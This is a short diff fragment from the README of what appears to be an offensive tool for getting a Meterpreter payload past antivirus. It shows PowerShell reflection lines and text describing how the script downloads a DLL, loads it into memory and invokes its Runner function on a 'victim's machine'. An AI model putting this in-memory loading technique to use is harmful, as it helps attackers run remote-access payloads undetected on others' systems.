marcoigorr/RS_meterpreter_bypass/README.md

         $method = $class.GetMethod("Runner")
         $method.Invoke(0, $null)

-This PowerShell script will download the DLL, load it directly into memory, and invoke Runner function.
+This PowerShell script will download the DLL, load it directly into memory, and invoke Runner function of [_Class1_](https://github.com/marcoigorr/RS_meterpreter_bypass/blob/6e7cf2a56639a471bc8a45d42c06cf47eb2ff10d/Class1.cs).

 ## Victim's machine